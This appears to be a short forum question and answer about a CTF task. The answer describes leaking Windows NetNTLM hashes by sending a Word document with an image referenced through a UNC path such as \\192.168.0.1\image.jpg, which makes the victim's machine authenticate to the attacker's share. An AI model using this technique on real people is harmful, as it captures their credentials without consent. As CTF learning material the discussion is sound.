In one CTF, I encountered a task that is solved by getting NetNTLM \ NTLM or just getting username.
Tell me, please, is there any protocol that automatically sends NetNTLM / NTLM or username, when the connection is initialized?
The victim uses Windows 10.
UNC paths:
\\myserver\resource
The types of attacks that use this is sending a word document with an image embedded in it using a UNC path as the reference
\\192.168.0.1\image.jpg
Your machine will try to authenticate to the share to get the image and in doing so pass along the NetNTLM hash.
